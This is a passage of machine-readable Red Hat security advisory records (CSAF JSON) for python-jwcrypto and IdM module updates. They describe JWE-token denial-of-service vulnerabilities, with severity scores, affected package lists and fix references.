"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"AppStream-9.4.0.Z.MAIN.EUS:python-jwcrypto-0:0.8-5.el9_4.src",
"AppStream-9.4.0.Z.MAIN.EUS:python3-jwcrypto-0:0.8-5.el9_4.noarch"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:2559"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options don\u0027t meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"AppStream-9.4.0.Z.MAIN.EUS:python-jwcrypto-0:0.8-5.el9_4.src",
"AppStream-9.4.0.Z.MAIN.EUS:python3-jwcrypto-0:0.8-5.el9_4.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.8,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "HIGH",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"AppStream-9.4.0.Z.MAIN.EUS:python-jwcrypto-0:0.8-5.el9_4.src",
"AppStream-9.4.0.Z.MAIN.EUS:python3-jwcrypto-0:0.8-5.el9_4.noarch"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "python-jwcrypto: malicious JWE token can cause denial of service"
}
]
}
RHSA-2024:2559
Vulnerability from csaf_redhat
Notes
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Moderate"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "An update for python-jwcrypto is now available for Red Hat Enterprise Linux 9.",
"title": "Topic"
},
{
"category": "general",
"text": "The python-jwcrypto package provides Python implementations of the JSON Web Key (JWK), JSON Web Signature (JWS), JSON Web Encryption (JWE), and JSON Web Token (JWT) JOSE (JSON Object Signing and Encryption) standards.\n\nSecurity Fix(es):\n\n* python-jwcrypto: malicious JWE token can cause denial of service (CVE-2024-28102)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2024:2559",
"url": "https://access.redhat.com/errata/RHSA-2024:2559"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/#moderate",
"url": "https://access.redhat.com/security/updates/classification/#moderate"
},
{
"category": "external",
"summary": "2268758",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2268758"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_2559.json"
}
],
"title": "Red Hat Security Advisory: python-jwcrypto security update",
"tracking": {
"current_release_date": "2025-09-25T13:09:16+00:00",
"generator": {
"date": "2025-09-25T13:09:16+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.6.8"
}
},
"id": "RHSA-2024:2559",
"initial_release_date": "2024-04-30T13:36:16+00:00",
"revision_history": [
{
"date": "2024-04-30T13:36:16+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2024-04-30T13:36:16+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2025-09-25T13:09:16+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat Enterprise Linux AppStream (v. 9)",
"product": {
"name": "Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.4.0.Z.MAIN.EUS",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:enterprise_linux:9::appstream"
}
}
}
],
"category": "product_family",
"name": "Red Hat Enterprise Linux"
},
{
"branches": [
{
"category": "product_version",
"name": "python-jwcrypto-0:0.8-5.el9_4.src",
"product": {
"name": "python-jwcrypto-0:0.8-5.el9_4.src",
"product_id": "python-jwcrypto-0:0.8-5.el9_4.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python-jwcrypto@0.8-5.el9_4?arch=src"
}
}
}
],
"category": "architecture",
"name": "src"
},
{
"branches": [
{
"category": "product_version",
"name": "python3-jwcrypto-0:0.8-5.el9_4.noarch",
"product": {
"name": "python3-jwcrypto-0:0.8-5.el9_4.noarch",
"product_id": "python3-jwcrypto-0:0.8-5.el9_4.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-jwcrypto@0.8-5.el9_4?arch=noarch"
}
}
}
],
"category": "architecture",
"name": "noarch"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "python-jwcrypto-0:0.8-5.el9_4.src as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.4.0.Z.MAIN.EUS:python-jwcrypto-0:0.8-5.el9_4.src"
},
"product_reference": "python-jwcrypto-0:0.8-5.el9_4.src",
"relates_to_product_reference": "AppStream-9.4.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-jwcrypto-0:0.8-5.el9_4.noarch as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.4.0.Z.MAIN.EUS:python3-jwcrypto-0:0.8-5.el9_4.noarch"
},
"product_reference": "python3-jwcrypto-0:0.8-5.el9_4.noarch",
"relates_to_product_reference": "AppStream-9.4.0.Z.MAIN.EUS"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2024-28102",
"cwe": {
"id": "CWE-400",
"name": "Uncontrolled Resource Consumption"
},
"discovery_date": "2024-03-10T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2268758"
}
],
"notes": [
{
"category": "description",
"text": "An uncontrolled resource consumption vulnerability was found in python-jwcrypto. If a malicious JWE token with a high compression ratio is passed to the server, the server will consume a lot of memory and processing time, leading to a denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "python-jwcrypto: malicious JWE token can cause denial of service",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "The CVE-2024-28102 vulnerability in JWCrypto represents a moderate severity issue due to its potential impact on system availability and resource consumption. While the vulnerability allows for a denial of service (DoS) attack, it requires an attacker to craft a malicious JWE Token with a high compression ratio. This specific condition limits the practical exploitability of the vulnerability to some extent, as it demands a more sophisticated attack approach than common vulnerabilities. Nonetheless, if exploited, the vulnerability can lead to significant memory exhaustion and increased server processing time, impacting the overall performance and availability of the affected system.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"AppStream-9.4.0.Z.MAIN.EUS:python-jwcrypto-0:0.8-5.el9_4.src",
"AppStream-9.4.0.Z.MAIN.EUS:python3-jwcrypto-0:0.8-5.el9_4.noarch"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-28102"
},
{
"category": "external",
"summary": "RHBZ#2268758",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2268758"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-28102",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-28102"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-28102",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-28102"
},
{
"category": "external",
"summary": "https://github.com/latchset/jwcrypto/commit/90477a3b6e73da69740e00b8161f53fea19b831f",
"url": "https://github.com/latchset/jwcrypto/commit/90477a3b6e73da69740e00b8161f53fea19b831f"
},
{
"category": "external",
"summary": "https://github.com/latchset/jwcrypto/security/advisories/GHSA-j857-7rvv-vj97",
"url": "https://github.com/latchset/jwcrypto/security/advisories/GHSA-j857-7rvv-vj97"
}
],
"release_date": "2024-03-08T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-04-30T13:36:16+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"AppStream-9.4.0.Z.MAIN.EUS:python-jwcrypto-0:0.8-5.el9_4.src",
"AppStream-9.4.0.Z.MAIN.EUS:python3-jwcrypto-0:0.8-5.el9_4.noarch"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:2559"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options don\u0027t meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"AppStream-9.4.0.Z.MAIN.EUS:python-jwcrypto-0:0.8-5.el9_4.src",
"AppStream-9.4.0.Z.MAIN.EUS:python3-jwcrypto-0:0.8-5.el9_4.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.8,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "HIGH",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"AppStream-9.4.0.Z.MAIN.EUS:python-jwcrypto-0:0.8-5.el9_4.src",
"AppStream-9.4.0.Z.MAIN.EUS:python3-jwcrypto-0:0.8-5.el9_4.noarch"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "python-jwcrypto: malicious JWE token can cause denial of service"
}
]
}
rhsa-2024_3267
Vulnerability from csaf_redhat
Notes
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Moderate"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "An update for the idm:DL1 and idm:client modules is now available for Red Hat Enterprise Linux 8.\n\nRed Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.",
"title": "Topic"
},
{
"category": "general",
"text": "Red Hat Identity Management (IdM) is a centralized authentication, identity management, and authorization solution for both traditional and cloud-based enterprise environments. \n\nSecurity Fix(es):\n\n* JWCrypto: denail of service Via specifically crafted JWE (CVE-2023-6681)\n\n* python-jwcrypto: malicious JWE token can cause denial of service (CVE-2024-28102)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2024:3267",
"url": "https://access.redhat.com/errata/RHSA-2024:3267"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/#moderate",
"url": "https://access.redhat.com/security/updates/classification/#moderate"
},
{
"category": "external",
"summary": "2260843",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2260843"
},
{
"category": "external",
"summary": "2268758",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2268758"
},
{
"category": "external",
"summary": "RHEL-28842",
"url": "https://issues.redhat.com/browse/RHEL-28842"
},
{
"category": "external",
"summary": "RHEL-29908",
"url": "https://issues.redhat.com/browse/RHEL-29908"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_3267.json"
}
],
"title": "Red Hat Security Advisory: idm:DL1 and idm:client security update",
"tracking": {
"current_release_date": "2024-11-24T15:46:23+00:00",
"generator": {
"date": "2024-11-24T15:46:23+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.2.1"
}
},
"id": "RHSA-2024:3267",
"initial_release_date": "2024-05-22T11:47:22+00:00",
"revision_history": [
{
"date": "2024-05-22T11:47:22+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2024-05-22T11:47:22+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2024-11-24T15:46:23+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat Enterprise Linux AppStream (v. 8)",
"product": {
"name": "Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:enterprise_linux:8::appstream"
}
}
}
],
"category": "product_family",
"name": "Red Hat Enterprise Linux"
},
{
"branches": [
{
"category": "product_version",
"name": "idm:client:8100020240417004735:143e9e98",
"product": {
"name": "idm:client:8100020240417004735:143e9e98",
"product_id": "idm:client:8100020240417004735:143e9e98",
"product_identification_helper": {
"purl": "pkg:rpmmod/redhat/idm@client:8100020240417004735:143e9e98"
}
}
},
{
"category": "product_version",
"name": "ipa-client-common-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch",
"product": {
"name": "ipa-client-common-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch",
"product_id": "ipa-client-common-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client-common@4.9.13-9.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "ipa-common-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch",
"product": {
"name": "ipa-common-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch",
"product_id": "ipa-common-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-common@4.9.13-9.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "ipa-healthcheck-core-0:0.12-3.module+el8.9.0+19692+fac39a03.noarch",
"product": {
"name": "ipa-healthcheck-core-0:0.12-3.module+el8.9.0+19692+fac39a03.noarch",
"product_id": "ipa-healthcheck-core-0:0.12-3.module+el8.9.0+19692+fac39a03.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-healthcheck-core@0.12-3.module%2Bel8.9.0%2B19692%2Bfac39a03?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "ipa-python-compat-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch",
"product": {
"name": "ipa-python-compat-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch",
"product_id": "ipa-python-compat-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-python-compat@4.9.13-9.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "ipa-selinux-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch",
"product": {
"name": "ipa-selinux-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch",
"product_id": "ipa-selinux-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-selinux@4.9.13-9.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "python3-ipaclient-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch",
"product": {
"name": "python3-ipaclient-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch",
"product_id": "python3-ipaclient-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-ipaclient@4.9.13-9.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "python3-ipalib-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch",
"product": {
"name": "python3-ipalib-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch",
"product_id": "python3-ipalib-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-ipalib@4.9.13-9.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "python3-jwcrypto-0:0.5.0-2.module+el8.10.0+21692+c9b201bc.noarch",
"product": {
"name": "python3-jwcrypto-0:0.5.0-2.module+el8.10.0+21692+c9b201bc.noarch",
"product_id": "python3-jwcrypto-0:0.5.0-2.module+el8.10.0+21692+c9b201bc.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-jwcrypto@0.5.0-2.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "python3-pyusb-0:1.0.0-9.1.module+el8.9.0+18920+2223d05e.noarch",
"product": {
"name": "python3-pyusb-0:1.0.0-9.1.module+el8.9.0+18920+2223d05e.noarch",
"product_id": "python3-pyusb-0:1.0.0-9.1.module+el8.9.0+18920+2223d05e.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-pyusb@1.0.0-9.1.module%2Bel8.9.0%2B18920%2B2223d05e?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "python3-qrcode-0:5.1-12.module+el8.9.0+18920+2223d05e.noarch",
"product": {
"name": "python3-qrcode-0:5.1-12.module+el8.9.0+18920+2223d05e.noarch",
"product_id": "python3-qrcode-0:5.1-12.module+el8.9.0+18920+2223d05e.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-qrcode@5.1-12.module%2Bel8.9.0%2B18920%2B2223d05e?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "python3-qrcode-core-0:5.1-12.module+el8.9.0+18920+2223d05e.noarch",
"product": {
"name": "python3-qrcode-core-0:5.1-12.module+el8.9.0+18920+2223d05e.noarch",
"product_id": "python3-qrcode-core-0:5.1-12.module+el8.9.0+18920+2223d05e.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-qrcode-core@5.1-12.module%2Bel8.9.0%2B18920%2B2223d05e?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "python3-yubico-0:1.3.2-9.1.module+el8.9.0+18920+2223d05e.noarch",
"product": {
"name": "python3-yubico-0:1.3.2-9.1.module+el8.9.0+18920+2223d05e.noarch",
"product_id": "python3-yubico-0:1.3.2-9.1.module+el8.9.0+18920+2223d05e.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-yubico@1.3.2-9.1.module%2Bel8.9.0%2B18920%2B2223d05e?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "idm:DL1:8100020240416171943:823393f5",
"product": {
"name": "idm:DL1:8100020240416171943:823393f5",
"product_id": "idm:DL1:8100020240416171943:823393f5",
"product_identification_helper": {
"purl": "pkg:rpmmod/redhat/idm@DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "custodia-0:0.6.0-3.module+el8.9.0+18911+94941f82.noarch",
"product": {
"name": "custodia-0:0.6.0-3.module+el8.9.0+18911+94941f82.noarch",
"product_id": "custodia-0:0.6.0-3.module+el8.9.0+18911+94941f82.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/custodia@0.6.0-3.module%2Bel8.9.0%2B18911%2B94941f82?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "ipa-client-common-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"product": {
"name": "ipa-client-common-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"product_id": "ipa-client-common-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client-common@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "ipa-common-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"product": {
"name": "ipa-common-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"product_id": "ipa-common-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-common@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "ipa-healthcheck-0:0.12-3.module+el8.9.0+19634+c162f948.noarch",
"product": {
"name": "ipa-healthcheck-0:0.12-3.module+el8.9.0+19634+c162f948.noarch",
"product_id": "ipa-healthcheck-0:0.12-3.module+el8.9.0+19634+c162f948.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-healthcheck@0.12-3.module%2Bel8.9.0%2B19634%2Bc162f948?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "ipa-healthcheck-core-0:0.12-3.module+el8.9.0+19634+c162f948.noarch",
"product": {
"name": "ipa-healthcheck-core-0:0.12-3.module+el8.9.0+19634+c162f948.noarch",
"product_id": "ipa-healthcheck-core-0:0.12-3.module+el8.9.0+19634+c162f948.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-healthcheck-core@0.12-3.module%2Bel8.9.0%2B19634%2Bc162f948?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "ipa-python-compat-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"product": {
"name": "ipa-python-compat-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"product_id": "ipa-python-compat-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-python-compat@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "ipa-selinux-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"product": {
"name": "ipa-selinux-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"product_id": "ipa-selinux-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-selinux@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "ipa-server-common-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"product": {
"name": "ipa-server-common-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"product_id": "ipa-server-common-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-server-common@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "ipa-server-dns-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"product": {
"name": "ipa-server-dns-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"product_id": "ipa-server-dns-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-server-dns@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "python3-custodia-0:0.6.0-3.module+el8.9.0+18911+94941f82.noarch",
"product": {
"name": "python3-custodia-0:0.6.0-3.module+el8.9.0+18911+94941f82.noarch",
"product_id": "python3-custodia-0:0.6.0-3.module+el8.9.0+18911+94941f82.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-custodia@0.6.0-3.module%2Bel8.9.0%2B18911%2B94941f82?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "python3-ipaclient-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"product": {
"name": "python3-ipaclient-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"product_id": "python3-ipaclient-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-ipaclient@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "python3-ipalib-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"product": {
"name": "python3-ipalib-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"product_id": "python3-ipalib-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-ipalib@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "python3-ipaserver-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"product": {
"name": "python3-ipaserver-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"product_id": "python3-ipaserver-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-ipaserver@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "python3-ipatests-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"product": {
"name": "python3-ipatests-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"product_id": "python3-ipatests-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-ipatests@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "python3-jwcrypto-0:0.5.0-2.module+el8.10.0+21691+df63127d.noarch",
"product": {
"name": "python3-jwcrypto-0:0.5.0-2.module+el8.10.0+21691+df63127d.noarch",
"product_id": "python3-jwcrypto-0:0.5.0-2.module+el8.10.0+21691+df63127d.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-jwcrypto@0.5.0-2.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "python3-kdcproxy-0:0.4-5.module+el8.9.0+18911+94941f82.noarch",
"product": {
"name": "python3-kdcproxy-0:0.4-5.module+el8.9.0+18911+94941f82.noarch",
"product_id": "python3-kdcproxy-0:0.4-5.module+el8.9.0+18911+94941f82.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-kdcproxy@0.4-5.module%2Bel8.9.0%2B18911%2B94941f82?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "python3-pyusb-0:1.0.0-9.1.module+el8.9.0+18911+94941f82.noarch",
"product": {
"name": "python3-pyusb-0:1.0.0-9.1.module+el8.9.0+18911+94941f82.noarch",
"product_id": "python3-pyusb-0:1.0.0-9.1.module+el8.9.0+18911+94941f82.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-pyusb@1.0.0-9.1.module%2Bel8.9.0%2B18911%2B94941f82?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "python3-qrcode-0:5.1-12.module+el8.9.0+18911+94941f82.noarch",
"product": {
"name": "python3-qrcode-0:5.1-12.module+el8.9.0+18911+94941f82.noarch",
"product_id": "python3-qrcode-0:5.1-12.module+el8.9.0+18911+94941f82.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-qrcode@5.1-12.module%2Bel8.9.0%2B18911%2B94941f82?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "python3-qrcode-core-0:5.1-12.module+el8.9.0+18911+94941f82.noarch",
"product": {
"name": "python3-qrcode-core-0:5.1-12.module+el8.9.0+18911+94941f82.noarch",
"product_id": "python3-qrcode-core-0:5.1-12.module+el8.9.0+18911+94941f82.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-qrcode-core@5.1-12.module%2Bel8.9.0%2B18911%2B94941f82?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "python3-yubico-0:1.3.2-9.1.module+el8.9.0+18911+94941f82.noarch",
"product": {
"name": "python3-yubico-0:1.3.2-9.1.module+el8.9.0+18911+94941f82.noarch",
"product_id": "python3-yubico-0:1.3.2-9.1.module+el8.9.0+18911+94941f82.noarch",
"product_identification_helper": {
